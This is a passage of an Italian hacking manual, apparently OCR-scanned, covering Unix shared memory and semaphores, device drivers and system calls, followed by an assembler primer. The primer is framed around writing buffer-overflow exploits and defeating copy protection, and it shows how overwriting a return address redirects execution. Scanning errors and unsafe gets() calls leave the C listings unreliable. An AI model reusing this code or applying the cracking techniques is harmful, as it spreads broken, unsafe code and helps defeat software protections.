o_com [0] . sem_op = 1 ; 

if ( (semval = semop (sem_id, o_com, 1) ) < 0) { 
perror ( "Prenotazione semaforo ") ; 
exit (-1) ; 

} 

} 

main ( ) 
{ 

int radice = —1; 
char a[ll] ,b[ll] ; 
signal (SIGINT, terminate) ; 

if ( (sem_id = semget (chiave, 1, 0666 1 IPC_CREAT) ) < 0) { 
perror ( "Creazi one semaforo ") ; 
exit (-1) ; 

} 

if ( (shm_id = shmget (chiave, DIM_SHM, 0666 \ IPC_CREAT) ) < 0) { 
perror ( "Creazione memoria condivisa") ; 
exit (-1) ; 
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; 

if((mem = (SHMEMORY *) shmat (shm_id, 0, 0) ) < 0) { 
perror ( "Mappatura memoria ") ; 
exit (-1) ; 

} 

o_com [0] . sem_num = 0; 
o_com[0] .sem_flg = SEM_UNDO; 
o_com [ 0 ] . sem_op = 2; 

if ( (semval = semop (sem_id, o_com, 1) ) < 0) { 
perror ( "Prenotazione semaforo ") ; 
exit (-1) ; 

} 

printf ( " \n \nInserimento codici . ") ; 
while(l) { 
printf ("\n\nCodice 1 : ") ; 
gets (a) ; 
if(!a[0]) 

terminate () ; 
printf ("Codice 2 : ") ; 
gets (b) ; 
if(!b[0]) 

terminate () ; 

insert (a,b, Sradice) ; 

radice = 0; 

printf ("\n\n") ; 




Il programma ricevente in questo caso stampa ricorsivamente tutto l'albero. 

Una modifica dell'algoritmo potrebbe trasformarlo in un programma di ricerca. 

Supponete di avere la necessita' di creare un vocabolario di risposte a determinate 

sequenze ricevute da un terminale. 

Codice 1 potrebbe essere la chiave di ricerca mentre codice 2 la risposta abbinata. 

La ricerca avvenendo nella memoria condivisa offrirebbe due vantaggi. 

Il primo e' legato al fatto che le informazioni sarebbero a disposizione di più' processi. 

Il secondo invece e' rappresentato dal fatto che la ricerca delle informazioni risulta essere più' 

veloce di quanto lo possa essere utilizzando un data base su disco anche in virtù' della 

gestione 

su alberi binari del tutto. 

In ogni caso il listato dell'esempio incaricato della stampa ricorsiva di tutto l'albero e' il 
seguente. 



#include <stdio.h> 

#include <sys/signal.h> 

#include <sys/types.h> 

#include <sys/ipc.h> 

#include <sys/shm.h> 

#include <sys/sem.h> 

typedef struct node { 

char key[10]; 

char risposta[1 0]; 

int destra, sinistra; 
} NODE; 

typedef struct shm { 
int numeronodi; 
NODE n_nodi [2000]; 
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SHMEMORY *mem; 

struct sembuf o_com [1]; 

#define DIM SHM sizeof (SHMEMORY) 

key_t chiave = 123456; 

int shm_id; 
int sem_id; 
int semval; 

terminate() 
{ 

printf("\n* Libero semforo."); 
semcti(sem_id,0,IPC_RMID); 
printf("\nOK!\n\n"); 
exit(O); 



scan(pos) 
int pos; 
{ 

if(pos >= 0) { 
scan(mem->n_nodi[pos]. sinistra); 
printf("\nCodice 1 : %s Codice 2 : %s", 
mem->n_nodi[pos].key,mem->n_nodi[pos]. risposta); 
scan(mem->n_nodi[pos]. destra); 

} 

} 

main() 
{ 

int radice = -1 ; 
char a[11],b[11]; 
signal(SIGINT, terminate); 

if((sem_id = semget(chiave,1 ,0666|IPC_CREAT)) < 0) { 
perror("Creazione semaforo"); 
exit(-1); 

} 

if((shm_id = shmget(chiave,DIM_SHM,0666|IPC_CREAT)) < 0) { 
perror("Creazione memoria condivisa"); 
exit(-1); 

} 

if((mem = (SHMEMORY *) shmat(shm_id,0,0)) < 0) { 
perrorfMappatura memoria"); 
exit(-1); 

} 

o_com[0].sem_num = 0; 

o_com[0].sem_flg = SEM_UNDO; 

o_com[0].sem_op = 1 ; 

if((semval = semop(sem_id,o_com,1)) < 0) { 
perror("Prenotazione semaforo"); 
exit(-1); 

} 

o_com[0].sem_op = -1 ; 
if((semval = semop(sem_id,o_com,1)) < 0) { 
perror("Prenotazione semaforo"); 
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exit(-1); 
} 

scan(O); 

o_com[0].sem_op = 1 ; 

if((semval = semop(sem_id,o_com,1)) < 
perror("Prenotazione semaforo"); 
exit(-1); 



0){ 



Device Drivers 



Un device driver non e' altro che un insieme di routine atte a comunicare con una 
periferica hardware e a uniformare l'interfacciamento con il kernel dello Unix stesso. 
In altre parole il device driver permette allo Unix di interpretare le chiamate da parte 
dell'utente per I' I/O verso una determinata periferica. 



+ + 

; Programma utente : 
+ + 

v 

+ + + 

; Kernel — >: Device : 
+ + + 

v 

+ + 

; Periferica : 



Parlando inizialmente dei devices sotto Unix avevamo detto che questi possono essere 
fondamentalmente di due tipi differenti e cioè' quelli a carattere e quelli a blocchi. 
In pratica il primo tipo comunica direttamente con il programma utente in quanto I' I/O 
avviene carattere dopo carattere. 

Il kernel in caso di una richiesta di I/O con un device di questo tipo gli passa direttamente il 
controllo a quest' ultimo interferendo il meno possibile nel colloquio tra utente e 
periferica lasciando privata la translazione dei dati. 

Nel caso dei device a blocchi il lavoro svolto dal kernel e maggiore in quanto il colloquio 

avviene a blocchi multipli della dimensione dei blocchi del sistema. 

Questa dimensione viene definita con BSIZE che sotto SysV e' di 1 024 bytes. 

Ciò' non significa che la dimensione dei blocchi del device deve essere per forza uguale a 

BSIZE. 

Nel caso che questa sia più' piccola di BSIZE allora il device iniziera' un trasferimento 
multiplo per muovere un singolo blocco. 

Un device appare agli occhi dell'utente come un normalissimo file che può' essere aperto 
e che può' supportare un certo numero di funzioni legate al suo controllo e all' I/O. 
Le differenze tra un file normale e un file speciale (il caso di un device), pur avendole già' 
accennate, sono fondamentalmente le seguenti. 

Ogni device possiede un numero suddivisibile in due parti e precisamente nella "parte 
maggiore" e nella "parte minore". 

La parte maggiore definisce il tipo del device mentre quella minore il numero dell'unita'. 
Un file relativo ad un device deve essere creato dalla cali di sistema MKNOD(). 
Utilizzando il comando Is -I (o T) avremo visualizzato il tipo del device. 
Un esempio una lista parziale di device a blocchi e a caratteri eseguita nella directory /dev e' 
la seguente : 
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major number + + minor 



number 



brw—rw—rw— 


1 


root 


root 


2, 


13 


Apr 


14 


1988 


fdl48ds8 


brw—rw—rw— 


3 


root 


root 


2, 


5 


Apr 


14 


1988 


fdl48ds9 


brw-rw-rw- 


1 


root 


root 


2, 


9 


Apr 


14 


1988 


fdl48ss8 


brw—rw—rw— 


1 


root 


root 


2, 


1 


Apr 


14 


1988 


fdl48ss9 


brw—rw—rw— 


2 


root 


root 


2, 


53 


Apr 


14 


1988 


fdl96 


brw-rw-rw- 


2 


root 


root 


2, 


53 


Apr 


14 


1988 


fdl96dsl5 


brw-rw-rw- 


1 


root 


root 


2, 


37 


Apr 


14 


1988 


fdl96ds9 


crw — w — w- 


2 


root 


root 


0, 


0 


Dee 


9 


17:12 


ttyOl 


crw — w — w— 


2 


root 


root 


0, 


1 


Dee 


9 


17:11 


tty02 


crw — w — w— 


2 


root 


root 


0, 


2 


Dee 


9 


17:11 


tty03 


crw — w — w- 


2 


root 


root 


0, 


3 


Dee 


9 


17:11 


tty04 



La prima lettera e' quella che identifica il tipo di device. 

Penso che sia intuitivo abbinare la lettera 'b' a un device a blocchi e la lettera x c' a uno a 
caratteri. 

Quando un utente apre un device driver lo Unix utilizza al fine di rintracciare l'entry point 
due tabelle (una per i device a caratteri e una per quelli a blocchi) utilizzando come indice il 
major number. 

Le due tabelle sono definite all'interno del file /usr/sys/conf/c.c creato al momento 
del "montaggio" del kernel. 

Le due tabelle sono esattamente cdevsw[] per i device a caratteri e bdevsw[] per quelli a 
blocchi. 

Un listato parziale di queste due tabelle e' il seguente : 

struct bdevsw bdevsw[]= { 

/* 0*/ 0 , nodev , nodev , nodev , 0 , 

/* 1*/ "wd" , wdopen , nulldev , wdstrategy , Swdtab , 

/* 2*/ "fd" , flopen , flclose , flstrategy , Sfltab , 

/*31*/ "ram" , ramopen , ramclose , ramstrategy , Sramtab , 

ì; 



struct edevsw cdevsw[]= { 

/* 0*/ "scrn" , cnopen 

cn_tty, 0, 

/* 1*/ "wd" , wdopen , 

0,0, . . 

/* 32*/ "err" , erropen 

0, 0, 



cnclose , enread , cnwrite , cnioctl , 
nulldev , wdread , wdwrite , wdloctl , 
errclose , errread , nodev , errloctl , 



Come dicevo prima Unix chiama l'entry point del device attraverso queste passandogli come 
parametro il minor number. 

Le funzioni open, dose, read, writeeioctl, agiscono sui device. 

Supponiamo che un processo apra il file speciale a caratteri /dev/tty01 il cui major number 
e'O. 

Andando a cercare in cdevsw[] alla posizione 0 nell'elemento della tabella relativa alla 
open troverebbe cnopen. 

Il kernel a questo punto chiamerebbe appunto cnopen. 

nulldev sta ad indicare che la funzione non e' utilizzata associata a quel particolare 
device. 

Se volessimo rappresentare graficamente il tutto 

open + 

dose ¥ 

read h 

write ^ 
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ioctl 1- 

CDEVSW[ ] v v v v v 
MAJOR NUMBER : 00 : xxopen : xxclose : xxread: xxwrite : xxioctl : 
:01: ; : : : : 



: DRIVER 

gestore interrupt 
+ 



v 

interrupt device 



Lo schema riportato precedentemente e' valido per quanto riguarda i device a carattere in 
quanto quelli a blocchi in genere indirizzano le chiamate read e write sulle chiamate alla 
buffer cache prima di accedere a quella che viene definita come strategia del device. 
Guardate la tabella bdevsw[] e vedrete che mancano le funzioni read e write ma che al loro 
posto si trova la xxstrategy. 

Come dicevamo prima oltre al major number usato come indice di tabella viena passato il 
minor number. 

Questo permette alle routine del device di ricevere informazioni come ad esempio il numero 
di un unita'. 

E' possibile in ogni caso utilizzare il minor number per passare altre informazioni. 

Vediamo prima di proseguire alcuni aprofondimenti per quanto riguarda il funzionamento 

del kernel. 

Avevamo precedentemente accennato alla suddivisione della memoria di un processo in 
quella utente e in quella del kernel. 

Il kernel normalmente applica due sistemi differenti per l'esecuzione di un istruzione a 
seconda che questa sia del programma utente o del kernel stesso. 

In pratica il primo modo di operare, nel caso di un istruzione utente, spinge il kernel a 
lavorare in quello definito come "user mode". 
Il secondo modo e' il "system mode". 

Quando il kernel riceve un interruzione da un dispositivo esterno questo entra in system 
mode (se già' non lo e') e il controllo e' passato alla routine di gestione d' interrupt del 
device interessato. 

Finito il suo lavoro ritorna permettendo al processo che era stato interrotto di riprendere. 
Un processo entra anche in system mode eseguendo una chiamata di sistema. 
Un programma utente comunque potrebbe lavorare indifferentemente in user mode o in 
system mode. 

In quest' ultimo modo e' disponibile un accesso privilegiato ai device e altri servizi. 

I sistemi operativi time sharing come Unix dispongono di un context switching che si 
interessa di eseguire il trasferimento del controllo della CPU da un processo ad un altro. 
Questo viene chiamato dallo scheduler che decide l'istante in cui eseguire lo scambio di 
contesto a seconda di un certo numero di venti valutati. 

Lavorando in user mode il kernel può' decidere di eseguire lo switching nei seguenti casi. 

II primo e' legato al fatto che il tempo a disposizione per un processo e' stato esaurito. 

Il context switcher viene in genere richiamato da uno scheduler che e' quello che si 
interessa per fare il controllore dei tempi di attivazione di ogni singolo processo. 
Lo scheduler in genere dispone di un clock interno e conosce il numero di incrementi di 
questo a disposizione di ogni processo. 

Un altra motivazione che potrebbe indurre alla sospensione del processo e' dovuta al fatto 
che quest'ultimo invochi una system cali che non può' essere completata immediatamente. 
Ogni processo possiede una speciale area di memoria definita come un area (user area) in 
cui vengono salvati dati utilizzati dal kernel per le gestione dei processi stessi e un 
system mode 
stack. 

Sotto MsDos quando viene chiamato un interrupt i registri modificati vengono salvati 
nello stack in modo che alla fine della routine di servizio l'ambiente possa essere ripristinato. 
Unix si comporta in un modo molto simile. 
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Quando un processo esegue una chiamata di sistema i suoi registri vengono salvati nella sua 
u_area. 

Quando una system cali termina questi vengono rispristinati permettendo al processo 
interrotto di proseguire. 

Panoramica sulle altre chiamate di sistema 

In questa parte finale del fascicolo riporterò' un breve descrizione di tutte le chiamate di 

sistema di cui non abbiamo mai parlato. 

Le chiamate già' viste (exec, dup ecc.) non vengono riportate. 

int access(path, pattern) 




Controlla se il programma chiamate ha diritti di lettura, scrittura o esecuzione su un 
determinato files specificato da path. 

Resistuisce 0 se esistono i permessi o -1 in caso contrario. 
Pattern può' essere una combinazione dei bit dei permessi 
che si vogliono testare. 

int brk(newbreak) 

char *newbreak; 

Come abbiamo già' detto un processo dispone di un segmento di testo, uno di stack e 
uno di data. 

Quest'ultimo dispone di una zona allocata e di una non allocata. 
Il break value e' il primo indirizzo oltre il segmento allocato per i dati. 
brk() assegna newbreak come valore più' alto della regione dati. 
Se avete problemi del genere guardate sbrk() per un compimento più' agevole dello 
scopo. 



int chdir(path) 




Cambia la directory corrente del processo chiamante con quella specificata da path. 



Ritorna 


-1 se si e' verificato un errore. 


int chmod(path,mode) 


char *path; 




int mode; 




Cambia i 


diritti d'accesso al file specificato in path utilizzando come mode un insieme dei 


seguenti flags 


04000 


bit setuid 


02000 


bit set group ID 


01000 


sticky bit 


00400 


lettura per il proprietario 


00200 


scrittura per il proprietario 


00100 


esecuzione per il proprietario 


00040 


lettura gruppo 


00020 


scrittura gruppo 


00010 


esecuzione gruppo 


00004 


lettura per gli altri 


00002 


scrittura per gli altri 


00001 
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int chown(path, prop, gruppo) 

char *path; 

int prop, gruppo; 

Cambia proprietario e gruppo del file in path. 



LI N GU AGGI 0 ASSEMBLER E ARCHI TETTURA SOFTWARE 

Voglio specificare che questo non vuole essere un manuale dettagliato di programmazione in 
assembler ma vuole soltanto dare un'infarinatura che vi permetta di analizzare il codice 
mostrato dai disassemblatori. 

Creare un buon manuale dell'assembler Pentium, x86 non è cosa semplice proprio per la 
complicazione dei processori stessi. 

Lo scopo è lo stesso di molti altrei capitoli considerati come complementari all'attività 
dell'hacker. 

Come abbiamo già detto in altri capitoli esistono delle metodologie particolari che pretendono 
la conoscenza dell'assembler e degli strumenti per l'analisi dei programmi scritti mediante 
questo linguaggio. 

Si tratta di quelle procedure legate alla creazione dei sistemi di buffers overflow in cui 
l'assembler subentra a due livelli. 

Il primo è quello legato all'analisi dei software e delle librerie di sistema alla ricerca di punti in 
cui non vengono fatti gli opportuni controlli sulla lunghezza dei buffers passati come 
argomenti. 

Il secondo punto invece è effettivamente legata alla scrittura del codice relativo all'exploit vero 
e proprio. 

A parte questo l'assembler è in ogni caso il linguaggio ufficiale del cracker e dell'hacker 
anche se poi per motivi pratici il Linguaggio C è molto più utilizzato. 

A dire il vero il motivo fondamentale non è esclusivamente questo ma quello relativo al fatto 
che gli exploits scritti in assembler sono dipendenti dalla piattaforma per cui non universali. 
In fase di programmazione esistono specifiche che vi permettono di definire segmenti, macro 
ecc. 

Nei listati riportati dai disassemblatori molte specifiche non sono mostrate in quanto i 
linguaggi che hanno originato il codice che vedete non sono di fatto assembler, ma qualsiasi 
altro a partire da Delphi per giungere a Basic ecc. 

Anche programmi che sono stati scritti in Macro Assembler dopo essere compilati perdono le 
loro caratteristiche. 

Questi programmi, infatti, fanno riferimento a simboli che il compilatore e il linker traducono in 
qualche altro modo o che comunque utilizza come direttive. 

Oltre a questo considerate che il codice che vedete in un debugger è quello in esecuzione per 
cui gli indirizzi sono assoluti. 
Veniamo al sodo. 

Originariamente l'elettronica dei PC è composta da processori dedicati alle varie funzioni che 
possiedono porte di programmazione e servizi per la richiesta di certe funzionalità, 
generalmente residenti su ROM presenti sulle schede stesse. 

La programmazione diretta dell'hardware del sistema tramite le varie porte di I/O sarebbe una 
cosa sufficientemente complessa e lunga per cui i costruttori dei personal hanno fornito i 
sistemi con all'interno un BIOS (Basic Input Output System) che offre servizi di base per la 
programmazione delle periferiche hardware. 

I servizi sono inseriti dentro a quelli che vengono definiti come interrupts che potremmo un pò 
paragonarli a metodi che possono essere richiamati in qualsiasi istante dai nostri programmi 
per eseguire diversi tipi di funzioni. 

Esistono funzioni d'interrupts legate alla scheda video, adatte a settare la modalità, a 
stampare caratteri, a settare colori ecc. 

Altre funzioni d'interrupts sono legate alle porte di comunicazione seriale e parallela e quindi 
indirizzate a controllare stampanti e modem. 

Anche i dischi possiedono le proprie funzioni d'interrupts per il loro controllo. 
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Queste funzioni offrono servizi minimali per cui il sistema operativo fornito con il computer 
aggiunge un altra serie d'interrupts pi ad alto livello che normalmente sono indicati come 
interrupts del DOS. 

Per spiegarmi meglio voglio riportare ad esempio l'interrupt che controlla il disco. 
Questo offre servizi minimali come ad esempio leggi un settore oppure scrivi un settore. 
Pensate se dovessimo scriverci noi tutte le routine per scrivere in un file e per fare in modo 
che questo venga strutturato in un insieme che costituisce le diretctory del nostro disco ! 
Sarebbe una cosa mostruosa. 

I servizi del DOS offrono funzionalità come ad esempio APRI UN FILE, LEGGI DAL FILE, 
CANCELLA IL FILE etc. 

Infatti il DOS supportandosi sul Bios eleva le sue funzionalità. 

II discorso degli interrupts è vasto e in alcuni casi complessi per cui in questa sede tralascierò 
gran parte della teoria per riportare solo le cose che possono essere importanti nel caso in cui 
si tenti di raggiungere una finalità come quella di sproteggere un programma. 

Gli interrupts si suddividono in due parti ovvero gli interrupts hardware e quelli software. 
A dire il vero esiste anche un terzo tipo anche se personalmente non oserei definirli come tali. 
In pratica questi sono gli interrupts di tabella il cui scopo è quello di fornire l'indirizzo di alcune 
tabelle di sistema. 

In altre parole quando viene chiamato un interrupt il sistema interompe quello che stava 
facendo salvando i dati da qualche parte, reperisce l'indirizzo dell'interrupt e prosegue 
l'esecuzione partendo dall'indirizzo reperito. 

Negli interrupts di tabella serve solo reperire l'indirizzo in quanto a quell'offset esistono dati 
utilizzati dal sistema. 

Le varie circuiterie elettroniche che compongono l'hardware dei nostri sistemi utilizzano gli 
interrupts hardware per segnalare alcuni eventi. 

Ad esempio un chip che controlla la porta seriale richiama un interrupts per segnalare la 
ricezione di un carattere. 

Gli interrupts possiedono una priorità per cui nel caso in cui vengano chiamati più interrupts 
l'ordine di esecuzione dipende proprio da questo. 

La memoria del sistema possiede una tabella a partire dall'indirizzo 0 che usa per mantenere 
gli indirizzi dei 256 interrupts possibili. 

Ogni indirizzo è costituito da 4 bytes per cui questa tabella è di 1 024 bytes (4 * 256). 

Nei computers esiste un concetto che è legato a quello che è lo stack che per ora vedremo 

scorporandolo dal concetto di segmento. 

Questo fatidico stack potrebbe essere paragonato allo spunzone dove i baristi infilano gli 
scontrini delle consumazioni. 

Chiaramente il primo scontrino inserito, in fase di estrazione, sarà anche l'ultimo ad essere 
estratto. 

Lo stack in un sistema è una zona della memoria che viene utilizzata per diversi scopi il cui 
funzionamento si attiene a questa logica. 

Lo stack serve per inserirci momentaneamente gli indirizzi di ritorno nelle chiamate 
subordinate. 

Nel caso di chiamate ad interrupts il sistema usa lo stack per inserire gli indirizzi di ritorno al 
punto in cui è avvenuta la chiamata. 

Per chi conosce il Basic posso riportare i due concetti legati al GOTO e al GOSUB. 
La prima è una chiamata incondizionata, ovvero il programma interrompe la sequenzialità 
nella sua esecuzione ed esegue un salto ad un altro punto, senza più ritornare a dove è stata 
eseguita la chiamata. 

La seconda invece necessita della memorizzazione dell'indirizzo di dove è stato eseguito il 
salto in quanto, dopo aver trovato l'istruzione RETURN, il programma dovrà ritornare al punto 
d'origine. 

Questo avviene anche per la chiamata a funzioni. 
Supponiamo che sia abbia il seguente codice. 

FUNZ_1 

SALVA_INDIRIZZO_NELLO_STACK 
ISTRUZIONE 1 
ISTRUZIONE n 

RIPRISTINA_ INDIRIZZO__DALLO_STACK 
FINE_FUNZ_1 
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ISTRUZIONE X 
CHIAMA_FUNZ_1 



La funzione salverà l'indirizzo nello stack e lo ripristinerà in uscita. 

Lo stack viene utilizzato anche per il salvataggio delle variabili locali, che come molti sanno, 
hanno un ciclo di vita pari a quello della durata della funzione stessa dove vengono 
dichiarate. 

Ad esempio le variabili a e b vengono inserite nello stack. 

void funzione () 
{ 

int a; 
int b; 
n = a + b; 



Una cosa che potreste trovare interessante. 

Abbiamo detto che a e b sono allocate nello stack per cui usando l'operatore del C che 
restituisce un indirizzo avremo che : 



sono due indirizzi che sono riferiti a posti nello stack. 

Abbiamo anche detto che una funzione in entrata salva l'indirizzo dove dovr tornare nello 
stack. 

Questo significa che nello stack troveremo : 



b-> ultimo valore allocato nello stack (2 bytes) 




Per cui se trattiamo indirizzi a 4 bytes avremo che 



Sa - 4 

corrisponde al posto dove la funzione ha salvato l'indirizzo di ritorno. 
Se usassimo il puntatore 

*(&a - 4) 

arriveremmo al contenuto ovvero all'indirizzo. 

Se a questo punto usassimo il costrutto di prima per assegnare un altro indirizzo potremmo 
ottenere che in uscita dalla funzione ritorneremmo ad un altro punto che non è quello da cui 
siamo partiti richiamando la funzione stessa. 

Lo stack viene inoltre utilizzato dalle funzioni per salvare i registri che vengono alterati dalle 
funzioni localmente in modo da non creare problemi alle funzioni chiamanti. 
Alcuni registri per convenzione vengono usati per passare i valori alle funzioni e per avere dei 
valori di ritorno. 

Altri registri vengono usati nelle elaborazioni locali della funzione stessa. 
I registri non usati per questo tipo di lavoro legato agli argomenti in ingresso ed in uscita 
possono essere salvati sullo stack in modo tale che il loro utilizzo localmente alla funzione 
non crei problemi. 

Ad esempio potrei usare il registro ESI per qualche motivo e poi chiamare una funzione che 
utilizza questo registro. 




A 00404FFC potrei avere 
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Mov esi, 45 

Pop esi 
Rat 

In questo modo il valore ESI verrebbe mantenuto integro anche dopo il suo uso nella funzione 
chiamata. 

Spesso diventa problematico, nel seguire le istruzioni di un programma, capire a che cosa 
servono le varie Push. 

Per schiarirci le idee possiamo seguire una logica. 

Le varie Push prima di una cali potrebbero servire a passare argomenti. 

Le Push all'inizio di una funzione controllate che non corrispondano delle Pop in uscita. 

In questo caso servirebbero solo a salvare l'ambiente. 

:004039D8 push ebx 

-.004039D9 push esi 

-.004039DA push edi 

■.004039DB mov ebx, eax 

-.004039DD mov esi, edx 

-.004039DF mov edi, ecx 

:004039E1 mov eax, edi 

:004039E3 cali DIRPRINT . 004039B4 

:004039E8 mov ecx, edi 

:004039EC test esi, esi 

-.004039EE je 004039F9 

:004039F0 mov edx, eax 

:004039F2 mov eax, esi 

:004039F4 cali DIRPRINT . 00402878 

:004039F9 mov eax, ebx 

:004039FB cali DIRPRINT . 004038F4 

:00403A00 mov dword ptr [ebx], edi 

:00403A02 pop edi 

:00403A03 pop esi 

-.00403A04 pop ebx 

:00403A05 ret 

Nell'esempio precedente vedete che all'inizio della funzione ci sono tre push alle quali alla 
fine corrispondono 3 pop. 

Notate anche che nei calcoli locali alle funzioni vengono usati proprio quei registri che 
vengono salvati. 

In questo modo viene salvaguardato il loro contenuto. 
Parlavamo prima degli interrupts. 

Ebbene, anche in questo caso viene usato lo stack in quanto gli indirizzi di ritorno dopo 

l'esecuzione delle funzioni d'interrupts vengono salvati in questo segmento. 

Se volete vedere gli indirizzi di dove si trovano gli interrupts potete andare ad analizzare i 

primi 1024 bytes di memoria. 

Come ? 

Spesso chi arriva dal Basic al C si lamenta che il C non possiede funzioni come quelle basic 
Peek e Poke che servono a leggere e scrivere valori in memoria. 

In C queste funzioni non servono a nulla in quanto grazie all'aritmetica dei puntatori sono 
completamente superflue. 
Se io definisco : 

unsigned int *memory; 

significa che memory è un puntatore ad una zona di memoria di 2 bytes ovvero le dimensioni 
di un int. 

La dichiarazione precedente non indica ancora a dove punta memory in quanto non gli è 
stato ancora assegnato un indirizzo. 
Se facessi 
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assegnerei a memory l'indirizzo di dove si trova var_int. 
Potrei però farci un assegnazione diretta ovvero : 



In questo caso il cast forzerebbe a vedere OxbOOOOOO come se fosse un indirizzo di memoria. 
In questo modo facendo : 

memory = (unsigned int *) OxOOOOOOOOL; ^^^^^^^^^^M 

forzerei memory a puntare all'indirizzo 0 per cui leggendogli il contenuto vedrei l'indirizzo del 
primo interrupt. 

Considerando che ogni indirizzo è di 4 bytes fate presto a fare i calcoli per stabilire l'indirizzo 
giusto. 

Questo metodo riporta i 4 bytes relativi all'indirizzo. 

Spesso gli indirizzi vengono memorizzati in memoria nel formato 



Se invece di definire la mia variabile come puntatore a 4 bytes, come potrebbe essere un 
puntatore ad un long, la definissi come un puntatore ad una struttura del tipo : 

struct off_seg { 

unsigned int segmento; 
unsigned int offset; 

}; 

struct off_seg *memory = (struct off_seg *) OxOOOOOOOOL; 

Avrei automaticamente i valori dell' offset e del segmento divisi in 



memory . 


segmento; 




memory . 


offset; 





Conoscere l'indirizzo di dove sono ubicate le routines degli interrupts è utile in quanto spesso 
è necessario sostituirle con nostre funzioni al fine di intercettare certe chiamate. 
Alcuni tipi di protezioni erano basate su certi interrupts per cui era necessario capire dove 
erano chiamate. 

I programmi d'intercettazione avevano un flusso di questo tipo : 
leggi 1' indirizzo di dove si trova 1' interrupt desiderato 



A questo punto ogni volta che veniva chiamato l'interrupts desiderato veniva richiamata la 
nostra funzione la quale eseguiva il seguente codice. 

Guarda perchè è stata chiamata 

Esegui quello ce devi fare 

Se è il caso invia al vecchio interrupts di cui conosci 1 ' indirizzo 

Debuggers come Soffice hanno la possibilità di visualizzare la mappatura di memoria. 
Utilizzando il comando : 



si ottiene la visualizzazione di come è mappata la memoria. 
Ad esempio : 
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Start 


JJCXJU L. Il 




0000:0000 


0040 


Interrupt Vector Table 


0040:0000 


0030 


ROM BIOS Variables 


0010:0000 


005A 


I/O System 


OOCa:0000 


014C 


DOS 


0259:0000 


0046 


XMSXXXXO 


029F-.0000 


0207 





Alcune funzionalità importantissime legate al debug dei programmi e quindi alle protezioni 
che cercano di eludere i debugger sono legate ad alcuni interrupts come ad esempio INT1 e 
INT3. 

Fino ad ora abbiamo parlato di segmenti senza definire che cosa si intendeva. 
Generalmente potremmo indicare con segmento il termine adatto ad indicare le diverse zone 
funzionali di un programma. 

Un programma possiede in genere di una zona di codice, una di dati e una in cui memorizza 

le informazioni momentanee (lo stack). 

Potremmo usare il termine segmento per indicare queste zone. 

Questa abitudine nasce però dal fatto che per motivi tecnici, dal punto di vista elettronico, i 

programmi usavano questi segmenti che erano zone di 64 Kbytes ciascuno. 

Una volta quando i processori erano a 8 e a 16 bits gli address bus dei sistemi erano a 20 

bits. 

Prima di proseguire diamo una rapida ripassata sul come è strutturato un sistema elettronico 
in forma generalizzata. 




Logicamente potremmo suddividerlo in 5 blocchi logici. 

Il primo blocco è quello della CPU alla quale sono demandati tutti i compiti legati 
all'esecuzione delle istruzioni del sistema. 

La CPU, a seconda del tipo, possiede al suo interno l'interprete del microcodice il quale 
interpreta le istruzioni ma a noi di questo interessa poco. 

La cosa pi interessante è legata al fatto che all'interno della CPU sono contenuti dei registri 
che potremmo paragonarli a variabili che il processore stesso usa per scopi suoi. 
Questi registri possiedono una certa dimensione anche se in genere possono essere visti 
come insiemi di contenitori pi piccoli. 

Ad esempio uno di questi registri è chiamato EAX il quale è grosso 32 bits. 
Facendo riferimento a EAX utilizziamo un numero a 32 bits. 
EAX però può essere visto come registro AX a 1 6 bits. 

A sua volta AX può essere usato come due registri a 8 bits e precisamente in AL e AH. 

Fate attenzione che non sono registri a parte per cui se assegnassimo un valore ad AX e poi 

uno ad AH andremmo a scrivere sopra alle informazioni inserite nella prima istruzione. 
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In pratica se facessimo 

MOV AX, 1 
MOV AH, 1 



In AX alla fine avremmo il numero rappresentato da quello binario 00000001 00000001 . 

La prima istruzione inserirebbe in AX il valore a 16 bits 1 che espresso in binario sarebbe 

0000000000000001 . 

La seconda istruzione inserirebbe in AH, che equivale alla parte alta di AX, il valore a 8 bits 
00000001 . Quindi come risultato avremmo quello indicato prima. 
In pratica considerate i registri come se fossero delle union del C. 
Per chi non lo sapesse in C la dichiarazione della struttura: 



struct x { 

int a; 
int b; 



occuperebbe in memoria la somma dei membri dichiarati nella struttura stessa e a e b 
sarebbero due variabili divise e distinte. 
La dichiarazione: 



union X { 

int a; 
char ah; 



riserverebbe in memoria lo spazio per il maggiore delle variabili definite. 
In questo caso per l'unione verrebbero allocati 2 bytes relativi all'int. 

La variabile ah utilizza una parte della memoria riservata per a e quindi se noi prima 
assegnassimo un valore ad a e poi uno ad ah andremmo a sovvrascrivere il valore settato 
nella prima istruzione. 

La CPU possiede diversi registri alcuni usati come accumulatori di uso generale ed altri 
invece possiedono scopi precisi. 

Il registro EIP ad esempio mantiene l'indirizzo dell' istruzione da eseguire. 

Altri registri come ad esempio ESI, ECS ecc. sono usati per mantenere gli indirizzi dei 

segmenti. 
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General-Purpose Registers 

I EAX 

EBX 

ECX 

EDX 

ESI 

EDI 

EBP 

ESP 



Segment Registers 
15 0 

I CS 

SS 

ES 

F3 

GS 



31 Status and Control Registers rj 

| 1 EFLAGS 

31 0 

I I BP 



I registri sono da considerare come celle di memoria interne al processore utilizzate per scopi 
vari. 

Tra questi esiste un registro specializzato nella segnalazione degli veneti. 
Si tratta del registro dei FLAGS. 
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31 30 29 2B 27 26 25 24 23 22 21 20 19 13 17 16 15 14 13 12 11 10 9 B76543210 



0 


0 


0 


0 


D 


0 


0 


0 


Q 


D 


I 

D 


V 

I 

P 


V 
1 

F 


A 

C 


V 
M 


R 
F 


a 


N 
T 


1 

0 
P 
L 


O 
F 


D 
F 


1 

F 


T 
F 


S 
F 


Z 
F 


0 


A 

F 


0 


P 
F 


1 


C 
F 



X IDFIagilD) 1 

X Virtual Interni pt Pending (VIP) ' 

X Virtual Interni pt Flag (VIFJ 1 

X Alignment Check (AC) ' 

X Vrtual-aOSSMode iVM) 1 

X Resumé Flag (RF) 1 

X NestedTask(NT) 1 

X I/O Privilege Level (IOPL) 

S Overflow Flag iOF) 

C Direction Flag (DF) 

X Interrupt Enable Flag (IF) 

X TrapFlag(TF) 

S SignFlag(SF) 

S Zero Flag (ZF) 

S Auxiliary Carry Flag (AF) 

S Parity Flag (PF) 

S Carry Flag (CF) 

S Indie ates a Status Flag 
C Indicates a Control Flag 
X Indicates a System Flag 

□ Reserved bit positions. DO NOT USE. 
Always set to values previo usly read. 

Alcuni registri sono utilizzati per la gestione dei segmenti. 



Linear Address 
Space for Program 



Segrnent Registers 



CS 

DS 

SS 

ES 

FS 

I GS 

The segrnent selector in 
each segrnent register 
points to an overlapping 
segrnent in the linear 
address space. 

Avevamo iniziato prima il discorso di questi segmenti. 
